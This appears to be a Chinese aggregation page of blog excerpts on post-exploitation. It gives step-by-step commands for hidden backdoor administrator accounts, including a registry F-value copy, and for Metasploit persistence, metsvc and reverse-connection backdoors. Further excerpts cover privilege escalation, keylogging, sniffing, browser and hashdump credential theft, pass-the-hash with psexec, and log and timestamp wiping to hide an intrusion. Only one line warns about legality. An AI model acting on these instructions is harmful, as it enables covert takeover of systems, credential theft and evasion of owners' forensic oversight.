精华内容
下载资源
问答
  • 渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。持续渗透的本质是线索关联,而线索关联为后续的攻击链方...后渗透的本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。
  • 后渗透 1

    2019-07-22 09:43:50
    后渗透的本质是权限把控,权限把控为后渗透提供了以牺牲时间换取空间的强大基础 首先,后渗透是什么意思?难道渗透还分前渗透和后渗透? 当然不是,后渗透是渗透测试之后的一系列扫尾工作,当你通过“增删改查”等...

    前言:

    渗透的本质是信息搜集,信息的搜集整理为后续的情报跟进提供了保证。

    后渗透的本质是权限把控,权限把控为后渗透提供了以牺牲时间换取空间的强大基础

    首先,后渗透是什么意思?难道渗透还分前渗透和后渗透?

    当然不是,后渗透是渗透测试之后的一系列扫尾工作,当你通过“增删改查”等操作(任意文件上传, 任意文件下载, 任意文件删除  任意文件读取)拿到webshell之后再次提权拿到系统权限之后的一系列操作 例如 留个后门方便下次再来啊,清理一下痕迹啊,把源码给down下来,脱个库啊之类的操作

    但是,最好不要去尝试 嗯 很严的 脱裤五十条三年

    首先 在windows上留后门 分为用户后门和程序后门  

    用户后门的话

    guest用户提权   net user guest 密码 /add  创建一个访客用户 net user guest /active:yes   激活用户 net localGroup administrators guest /add  把guest放到管理员的用户组里  这个方法好在了 基本每台设备上都会有guest 就算平时不用 但是会有这样的用户 对于那些没有什么电脑实操经验的人来说还行

     

    但是面对那些运维啊 或者ctf比赛里的参赛选手来说 就不行了 很容易就被发现了

    这种情况下呢 其实还是有方法的

    在HKEY-LOCAL-MACHINE里找到管理员对应的f表 复制二进制数值 将这个二进制数值黏贴给guest的f表 这样就不会那么容易被发现了 给它赋了管理员的权限 却没有在那个组里

    然后把主机的远程登陆打开

     

    改一下就可以

    然后远程一下 win+r  Mstsc

    当然了我没有直接连我的虚拟机 随意的敲了一个 到时候会提示登陆 只要输入我们刚刚留的后门账号的用户名和密码就可以了  这样的好处是 当翻看日志的时候 没有办法发现你如果你要是直接创建账户 然后在放进管理员用户组 只要翻看系统日志就可以发现你

    但是现在这种方法就...不是很好用 因为有杀软

    程序后门的话 见到的更多一些

    lpk后门 生成一个dll文件 捆绑一下 能免杀最好 捆绑一下 然后拿远程的工具去连接

    但是需要你有一个公网ip  很强的方法 但是。。没用过

    Linux下也是,使用远程的工具 打开ssh 然后去连接  工具的话 putty

    Putty是命令行的 我不知道winscp能不能用 这个是直观的看到文件的

    ssh 服务器名称@ip地址

    Linux下载openssh  往里面留一个后门

     

    然后是清理痕迹

    我们每一次访问页面都会在访问日志里面留下痕迹

    什么时候访问的 哪个ip访问的 访问了哪个页面等等

    这也是为什么我们有时候扫一下的时候会被发现 然后ip就被禁止了

    因为短时间内大规模的访问会让管理员 让系统警觉 从而发现攻击

    就算提交了马 也会因为修改时间让人发现 历史命令也会被存下来

    所以为什么 清理痕迹 那么重要

    Linux下清理痕迹

     历史记录一般都被保存在 /var/log目录下

    例如dpkg.log            当你访问了服务器之后会有httped目录 里面也会有大量的日志

    Message 里面存储了login,passwd之类的历史 也需要注意

    当我们发现了这些日志文件之后 要么就删除掉 毁尸灭迹

    要么就改掉

    把你的ip全都替换掉 访问页面全都替换掉

    这里其实还可以挂一个一句话 文件包含

    上传的文件 touch */

    然后history -c 把我的历史命令也清空

    Windows的历史在

    C:\windows\system32\winevt\logs\system.evtx 系统日志

    C:\windows\system32\winevt\logs\application.evtx 应用程序日志

    C:\windows\system32\winevt\logs\security.evtx 安全日志

    Windows下del一下就可以了

    Down源码和脱裤都可以通过上传马来实现

    当然了 后渗透的利器msfvenom很好用

    留在下一篇博客写

     

    展开全文
  • 一、后渗透阶段 二、后渗透的命令 三、meterpreter命令 1、基本命令 2、文件系统命令 3、网络命令 4、系统命令 四、后渗透模块 1、后渗透模块的使用方法 2、使用实例 五、meterpreter的应用 1、植入后门...

    目录

    一、后渗透阶段

    二、后渗透的命令

    三、meterpreter命令

         1、基本命令

         2、文件系统命令

         3、网络命令

         4、系统命令

    四、后渗透模块

         1、后渗透模块的使用方法

         2、使用实例

    五、meterpreter的应用

         1、植入后门远程控制

         2、提权

         3、信息窃取

         4、口令攫(jue)取与利用

         5、内网拓展

         6、掩踪灭迹

     

    文档截图:

    展开全文
  • 渗透测试——后渗透攻击

    千次阅读 2019-02-18 17:49:14
    Meterpreter 是一个提供了运行时刻可扩展远程 API 调用的攻击载荷模块,后渗透攻击脚本由 Meterpreter 客户端所解释,再远程调用 Meterpreter 服务端 (即运行在目标机上的攻击载荷) 提供的 API 来实现的。...

    Meterpreter 是一个提供了运行时刻可扩展远程 API 调用的攻击载荷模块,后渗透攻击脚本由 Meterpreter 客户端所解释,再远程调用 Meterpreter 服务端 (即运行在目标机上的攻击载荷) 提供的 API 来实现的。

    植入后门实施远程控制

    1. persistence 后渗透攻击模块

    persistence 帮助信息如下:
    在这里插入图片描述

    输入命令:run persistence -X -i 5 -p 443 -r 10.10.10.128
    在这里插入图片描述
    在 Meterpreter 会话中运行 persistence 后渗透攻击模块,在目标主机的注册表键 KHLM\Software\Microsoft\windows\Currentversion\Run 中添加键值达到自启动的目的;-X 参数指定启动的方式为开机自启动;-i 参数指定反向连接的时间间隔;然后建立 Meterpreter 的客户端,-p 参数指定回连的 443 端口进行监听;-r 参数指定回连的主机,然后等待后门重新连接。具体操作如下:
    在这里插入图片描述
    选择 exploit/multi/handler 模块,并选择 Meterpreter 回连会话的攻击载荷,执行 exploit 命令将开启监听,等目标主机重启之后,会通过注册表项中的自启动键设置启动 Meterpreter 攻击载荷,成功建立反向连接。

    2. metsvc 后渗透攻击模块

    使 Meterpreter 攻击载荷在目标主机上持久化的另一种方法是:利用 Metasploit 的 metsvc 后渗透攻击模块,将 Meterpreter 以系统服务的形式安装到目标主机上。具体操作命令如下:在这里插入图片描述
    只需要输入 run metsvc 运行 metsvc 模块,将在目标主机的 31337 端口开启后门监听服务,并上传三个 Meterpreter 的模块:

    • metsrv.dll (Meterpreter 的功能实现 DLL 程序)
    • metsvc-server.exe (服务启动时运行的程序,目的是对 metsrv.dll 进行加载)
    • metsvc.exe (将上述两个文件安装成服务)

    服务安装成功后,将在目标主机上开启监听并等待连接。

    以上这两个 Metasploit 后渗透攻击模块虽然解决了 Meterpreter 的持久控制问题,但是使用的技术非常普通与简单,隐蔽性较低,如果想提高隐蔽性,则可以上传经过免杀处理后的远程控制工具进行控制。

    3. getgui 后渗透攻击模块

    在渗透测试过程中,图形界面的操作方式更加方便省时,而且在特殊情况下,比命令行 Shell 会有更大优势,比如遇到关闭对方主机的系统安全盾需要输入图片形式验证码的场景。
    Metasploit 平台提供了可以通过 Meterpreter 会话开启远程桌面的后渗透攻击模块 getgui。具体操作如下:
    在这里插入图片描述
    通过命令 run getgui -u yt -p yt 在目标主机上添加了账号 “yt”,其密码为“yt”。并开启了远程终端控制,这时本地连接目标 IP 的 3389 端口即可进行远程控制,如果对方处在内网中的话,可以使用 portfwd 命令进行端口转发。

    注意:脚本运行的最后在 /root/.msf4/logs/scripts/getgui 生成了 clean_up_20190218.3938.rc 脚本。当在远程桌面终端操作完之后,可以使用这个脚本清除痕迹、关闭服务、删除添加的账号,如下所示:
    在这里插入图片描述


    权限提升

    想修改注册表、植入后面,一般需要获得目标主机的完全系统控制权。以 Windows 操作系统为例,用户必须具有 Administrator 管理员权限 或 SYSTEM 权限,才能够进行操作系统的设置与修改。而如果只有普通用户的权限,只能浏览被允许读取的文件,运行系统管理员允许其运行的软件,而不能修改系统配置和存取系统重要文件。

    getsystem 命令

    Meterpreter 的 getsystem 命令集成了 4 种权限提升技术。首先查看 getsystem 的帮助:
    在这里插入图片描述
    其中第一种和第四种技术分别利用的是 MS09-012 和 MS10-015 中的漏洞,括号的内容只是了提权所需的环境与初始权限。
    在这里插入图片描述


    信息窃取

    1. dumplink 模块

    通过 dumplink 模块来获得目标主机最佳进行的系统操作、访问文件和 Office 文档的操作记录。
    在这里插入图片描述
    在 Meterpreter 会话中运行 run post/windows/gather/dumplinks 命令之后,这个模块运行较慢,原因是对每一个 LNK 文件,Metasploit 都在 、root/.msf4/loot 目录下生成了对应的记录文件,包含了这个 LNK 文件对应的原始文件位置、创建和修改的时间等信息。

    2. enum——applications 模块

    通过 enum——applications 模块可以获得目标主机安装的软件、安全更新与漏洞补丁信息。
    在这里插入图片描述

    3. 键盘记录的用户输入模块

    使用 keyscan_start 命令启动键盘记录功能;
    keyscan_dump 命令能输出截获到的用户输入,包括回车退格等特殊字符;
    keyscan_stop 命令退出。


    口令攫取和利用

    1. 通过网络嗅探进行口令攫取

    首先输入在 Meterpreter 会话中输入命令 use sniffer 加载数据包嗅探模块 sniffer:
    在这里插入图片描述
    输入 help 命令查看嗅探模块帮助信息:
    在这里插入图片描述
    sniffer 模块包嗅探是捕获指定网卡上的数据信息,因此需要先使用 sniffer_interfaces 命令获得目标主机的网络接口信息;再使用 sniffer_start 指定网卡开启嗅探;使用 sniffer_dump 命令选择指定网卡进行监听,将截获到的数据保存到本地文件中。具体操作如下:
    在这里插入图片描述

    而捕获的网络数据包会以标准的 PCAP 文件格式进行存储,可以使用 WireShark 等工具进行查看和分析:
    在这里插入图片描述

    2. 通过浏览器进行口令攫取

    Metasploit 提供的后渗透攻击模块 post/windows/gather/enum_ie 可以读取缓存的 IE 浏览器密码:
    在这里插入图片描述
    注:此处演示没有太过具体,故没有获取到相应的信息。实战中通过输入命令 run post/windows/gather/enum_ie 可以将目标主机的 IE 浏览历史记录、保存的 Cookie 以及 IE 缓存的密码都保存到本地文件中,可以打开本地缓存密码文件进行查看。

    3. 系统口令攫取

    对于系统口令的攫取,Meterpreter 的用户接口命令里就有集成的 hashdump 命令,可以直接获取系统的密码哈希。
    在这里插入图片描述

    但是 Meterpreter 的 hashdump 命令在非 system 权限下会失败,而且在 Windows 7/Vista、Windows 2008 Server 下有时候会出现进程移植不成功等问题。而 Metasploit 中的后渗透攻击模块 smart_hashdump 功能更为强大。

    smart_hashdump 后渗透攻击模块的工作流程如下:
    ① 检查会话具有的权限和目标操作系统类型;
    ② 检查目标机是否是域控制服务器;
    ③ 在以上信息的基础上,首先尝试直接从注册表中读取哈希值,不成功的话再尝试注入 LSASS 进程,如果是域控制器将直接对 LSASS 进程进行注入;
    ④ 如果目标系统是 Windows 2008 Server,而且会话具有管理员权限,这时使用 getsystem 命令尝试获得 system 权限,如果在 system 权限下不能注入;LSASS 进程,这时候会用 migrate 命令将代码一直到已经运行在 system 权限的进程中,然后再对 LSASS 进程进行注入;
    ⑤ 如果检测到目标系统是 Windows 7/Vista,UAC 已经关闭,而且会话具有本地管理员权限,这时运行 getsystem 命令从注册表中读取;
    ⑥ 在 Windows 2003/2000/XP 系统下直接运行 getsystem 命令,如果成功再从注册表中读取哈希值。

    可以看出,smart_hashdump 模块考虑到了在多种系统环境下密码哈希获取的差异,以及在 LSASS 进程注入不成功情况下的解决办法,成功率提高不少。如果 Windows 7 开启了 UAC,这时需要首先使用绕过 Windows 7 UAC 的后渗透攻击模块。
    在这里插入图片描述
    这些密码信息会保存在数据库中。

    收集到的这些口令哈希有两种利用方法:

    • 第一种利用方法就是使用 L0phtCrack 等破解工具破解出明文口令后再进行利用
    • 第二种利用方法就是不用破解口令哈希,而是直接进行重放利用。Metasploit 中就集成了著名的 psexec 工具,利用获取的系统口令哈希进行传递攻击。

    内网渗透

    在实际渗透测试过程中,常常涉及一个内网渗透过程。这是因为目标网络可能只有一个互联网出口,由于路由问题,攻击机无法直接访问到内网及其。然而在内网中实施攻击有一定又是,内网中的安全防护一般会比较低,有时候甚至能监听到所有的内网流量。
    Metasploit 支持通过某个会话对内网及其进行拓展。简单地说就是以被攻陷的主机作为跳板,再对内网的其他主机进行攻击。

    1. 添加路由

    首先在 Meterpreter 控制台中运行 get_local_subnets 扩展脚本,可以得到受控主机所配置的内网网段信息。
    然后输入 background 命令跳转到 MSF 终端里,这时 Meterpreter 会话任在运行。
    接着在 MSF 终端执行添加路由命令 route add 10.10.10.0 255.255.255.0 2,告知系统将 10.10.10.0/24 网段 (即受控主机的本地网络) 通过会话 2 进行路由;然后通过 route print 命令可以查看当前活跃的路由设置。可以看到 Metasploit 成功的在会话 2 上添加了 10.10.10.0/24 这个网段的路由,这意味着你对 10.10.10.0/24 网段的所有攻击和控制的流量都将通过会话 2 进行转发。
    在这里插入图片描述

    2. 进行 445 端口扫描

    配置完毕后,可以对 10.10.10.0/24 网段简单地进行 445 端口扫描:
    在这里插入图片描述
    可以看到开启了 445 端口的主机,很可能是启用了 Windows 文件与打印共享服务。

    这时可以利用之前攫取的口令哈希进行哈希传递攻击

    3. 哈希口令攻击过程

    一旦用户使用相同的口令登录这些主机,就可以利用攫取到的口令哈希获取访问权。
    在这里插入图片描述
    在建立起攻击机到目标网段的路由转发路径之后,就可以在攻击机的 MSF 终端上利用 psexec 模块use exploit/windows/smb/psexec;设置一个回连的 Meterpreter 攻击载荷 set payload windows/meterpreter/reverse_tcp;回连至攻击机 IP 地址set LHOST 10.10.10.132 和 回连的端口号 set LPORT 443;设置扫描出的目标主机 IP 地址 set RHOST 10.10.10.129;然后设置 SMBPass 为之前攫取到的口令哈希值 set SMBPass ***。执行 exploit 命令后,就会尝试以此口令进行 SMB 的身份认证,一旦命中口令,就会成功打开一个 Meterpreter 会话。


    毁灭痕迹

    1. clearev 命令

    可以利用 Meterpreter 中提供的 clearev 命令清除日志中留下的入侵痕迹:
    在这里插入图片描述

    2. timestomp 命令

    对文件进行操作可能会改变文件的修改或访问时间,此时使用 Meterpreter 的 timestomp 命令修改文件的创建时间、最后写入与最后访问时间:
    在这里插入图片描述

    展开全文
  • 后渗透阶段的攻防对抗 下一代
  • 后渗透(一)

    千次阅读 2019-04-15 17:50:09
    本文及以后系列仅限于针对小白的学习,首先我们先大体了解一下我们要做的渗透到底有哪些,渗透包括但不限于前端渗透(web安全),后渗透及内网渗透,此系列为后渗透的讲解。 二.什么是后渗透 我们了解到前端安全...

    一.前言

    本文及以后系列仅限于针对小白的学习,首先我们先大体了解一下我们要做的渗透到底有哪些,渗透包括但不限于前端渗透(web安全),后渗透及内网渗透,此系列为后渗透的讲解。

     

    二.什么是后渗透

    我们了解到前端安全包括了SQL注入,任意文件上传,XSS,CSRF,逻辑漏洞,跨域漏洞等等,我们知道我们都想将这些漏洞加以利用或组合来进行getshell的。在这里我们再区分一下getshell和webshell的区别,webshell更多的是获取前端的权限,顾名思义,一般仅限于前端或文件的增删改查;那么getshell则是获取更大的权限。一般的思路为挖掘漏洞,通过漏洞加以组合或利用进一步获取webshell或后台权限或更大的权限,之后再进一步进行扩大”战果"来getshell。

    如下:

    漏洞----》后台----》getshell

    or

    漏洞-----》getshell

     

    三.渗透的几种权限

    1)后台权限 2)shell权限 3)服务器权限 4)域控权限

    其中 1),2)属于前端渗透,3)4)属于内网渗透,2)3)4)属于后渗透

     

    四.木马分类

    扩大“战果”离不开木马,下面我们分别根据语言和木马类型对它们进行分类

    1.按语言分类:

    我们知道语言基本分为以下几种:php ,jsp ,jspx ,aspx ,ashx ,asp ,asa ,cer ,cdx

    这里我们普及下语言所对应的服务环境:

    php :Nginx和Apache

    jsp ,jspx :Tomcat(java)

    aspx ,ashx ,asp ,asa ,cer ,cdx :IIS

    2.按木马分类:

    一句话木马 :代码可只为一行,体积小

    小马 :隐蔽性强,较小

    大马 :功能性强,较大

    在实战渗透测试中,往往会遇到各种各样的waf进行拦截,也为防止有人可以恶意利用木马,我们往往会对我们的木马进行混淆,在这里不对混淆进行详细描述。

     

    五.知己知彼,百战不殆——系统权限(windows)

    考虑到面向对象的原因,在此先行介绍windows,针对于linux的知识将于以后的红蓝对抗讲解中介绍。

    1.权限划分:

    System:系统权限;Administrator:管理权限(可提权);User:来宾权限(管理员赋予后可提权)

    2.用户划分:

    Administrator:管理员;Users:普通用户

    3.权限继承因素:

    即以什么权限身份打开一些命令或应用程序,那些命令或应用程序就以此权限进行任务。

    4.特有的IIS权限(低于User):

    左图为win主机里进行设置iis应用程序权限,右图为模拟渗透的菜刀的命令界面图,我们可以发现有以下特有权限

    IIS apppool\defeatapppool

    nt authority\local service

    nt authority\network service

    nt authority\system

     

    六.常用cmd命令(查看及添加用户权限)(请关注此条,一直更新):

    whoami:当前权限

    net user:查看所在用户

    net user 用户名 密码 /add :添加用户和对应密码(密码一般为字母+数字+符号)

    net localgroup 用户组名 用户名 /add :将指定用户添加到指定用户组

    tasklist /svc :查看当前计算机中运行的程序与之相对应的服务

    taskkill /f /im 程序名称 :结束某个指定名称的程序

    taskkill /f /PID ID :结束某个指定PID的进程

    netstat -ano :查询当前计算机中网络连接通信情况,LISTENING表示当前计算机已开放的端口处于监听状态;ESTABLISHED表示该端口正处于工作(通信)状态

    tasklist /svc | find "端口":查找输出结果中指定的内容

    systeminfo   :查看当前计算机中的详细情况

    quser:查询当前在线的管理员

    logoff :注销某个指定用户的ID

    shutdown -r :重启当前计算机

     

     

    展开全文
  • 后渗透介绍及运用

    千次阅读 2019-11-04 23:11:19
    目录一、前言二、后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获取权限11.捕捉屏幕12.得到远程桌面...
  • 后渗透阶段的网络攻防对抗.pptx
  • 《Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结。
  • 后渗透之信息收集

    千次阅读 2021-04-11 11:33:35
    接上一篇文章我们获取了一个shell并提升为system权限后 -》Windows后渗透之权限提升,接下来进行信息收集,或者先信息收集在提权都行。meterpreter该工具具有多重功能,使后续的渗透变得更加容易。获取目标机的...
  • Metasploit之——基本后渗透命令

    千次阅读 2019-01-27 15:22:45
    核心Meterpreter命令指的是已经被Meterpreter攻击载荷成功渗透的计算机向我们提供的用于后渗透操作的基本功能。 注意:Metasploit的后渗透命令都是在拿到了目标主机的Meterpreter权限之后,在Meterpreter命令行下...
  • 垂体后叶素治疗后渗透性脱髓鞘综合征医疗损害鉴定1例.pdf
  • Kubernetes简介 Kubernetes环境的一般渗透过程 k0otkit:针对Kubernetes的通用后渗透控制技术 总结 · 攻 总结 · 防
  • Metasploit是一个框架,加载payload成功拿下靶机后可以进行的进一步操作称之为后渗透命令。 Meterpreter命令详情 下面是一些常用的后渗透命令及实验。 基本命令: 基本命令包含Meterpreter与MSF终端,Ruby接口,...
  • 后渗透之meterpreter学习笔记

    千次阅读 多人点赞 2019-09-25 09:45:11
    Meterpreter是Metasploit框架中的一个扩展模块,作为后渗透阶段的利器,其强大之处可想而知,我这里就简单介绍一下常用命令。 0x01 系统命令 基本系统命令 background # 将当前会话放置后台 sessions # sessions...
  • 继续上一篇《Armitage之——使用Armitage进行渗透》 攻击机 Kali 192.168.175.128 靶机 WinXP 192.168.175.130 ...当想执行后渗透模块的时候,只需在成功渗透了的主机上面单击鼠标右键,然后选择下拉菜单中的Met...
  • 为得到煤储层水力压裂后的渗透率,基于水力压裂施工曲线和注入/压降试井测试渗透率原理,建立了水力压裂后渗透率预测模型。根据晋城矿区潘庄区块和焦作矿区恩村区块煤层气的勘探开发资料,验证了模型的准确性和有效性。...
  • MSF(六):后渗透

    千次阅读 2020-02-21 13:57:28
    后渗透测试 安全牛学习Metasploit Framework笔记 一、已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二、基于已有session扩大战果 - msfvenom -a x86 --platform ...
  • 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter ...
  • 后渗透之meterpreter使用攻略

    千次阅读 多人点赞 2019-01-06 14:38:28
    Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本...
  • 中国蚁剑后渗透框架 详细介绍:http: 支持类型:php / jsp / aspx 有效载荷部分很多很多了了跟的实现,向其开发者们表示感谢! 支持列表 模块名称\ Shell类型 PHP ASPX JSP 基本信息 √ √ √ 反弹壳 √ √ ...
  • 网络环境 实验前提 1.外网win7上传一句话菜刀连接2008 2.上传 3.kali配置隧道端口 sudo vim /etc/proxychains.conf ./reGeorgSocksProxy.py -u ...proxychains msfconsole
  • .NET下妙用DLL+处理映射实现后渗透权限维持 Ivan@360云影实验室 2018年07月18日 0x01 前言 话说笔者在探索.NET实现一句话木马系列中在使用一般处理程序(当然也不限于ashx,asmx照样可用)的时候发现一处功能点可以...
  • 这个教程主要侧重于内网渗透metasploit中的meterete视频实操,小编自认为不错,因为免费分享给更多人学习,想学习更多内容下载按照向导关注我们的自媒体平台即可,谢谢支持!
  • 通信行业6月动态报告:发牌一年后渗透率高,行业应用加速5G推进.pdf
  • 本文是“网络安全提高篇”第三篇文章,继续带领大家深入Metasploit技术,涉及后渗透相关的技术,包括信息收集、权限提权、移植漏洞模块和后门。同时,结合作者之前的漏洞利用及WannaCry逆向经验总结。本文学习了徐焱...
  • 后渗透攻击

    千次阅读 2018-12-01 11:38:27
    ,需要在目标机器上编译运行,之后提权,也有少部分 exp 是按照发行版版本命名。 提权 exp 的基本使用方法: 执行这个可执行文件,一般情况下 Linux 的本地提权要用 nc 反弹出来,因为 Linux 下提升权限...
  • 后渗透攻防的信息收集 -- MottoIN

    千次阅读 2016-08-25 17:11:50
    后渗透常见的信息收集思路 延伸: 渗透测试中的技巧后渗透阶段的攻防对抗linux入侵后续指南mimikittenz:又一款Windows密码获取工具 1.1系统管理员密码 A.常用来获取windows密码的工具 1.mimikatz ...
  • 比CMD更强大的命令行:WMIC后渗透利用(系统命令)

    万次阅读 多人点赞 2018-09-15 11:00:07
    在这篇文章中,我们将讨论如何在攻击的后渗透利用阶段使用WMIC(Windows Management InstrumentationCommand Line)。当攻击者在远程PC上拿到meterpreter会话之后,他们就可以枚举大量的系统信息,并利用WMI命令行...
  • 后渗透msf路由转发

    千次阅读 2020-02-29 13:19:19
    渗透的过程中常常会遇到这种场景:我们已经通过web渗透拿下一台内网服务器,为了进一步进行内网渗透,我们会利用“沦陷主机”作为跳板进行进一步的内网渗透,扩大战果。 MSF的跳板功能是MSF框架中自带的一个路由...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 82,421
精华内容 32,968
关键字:

后渗透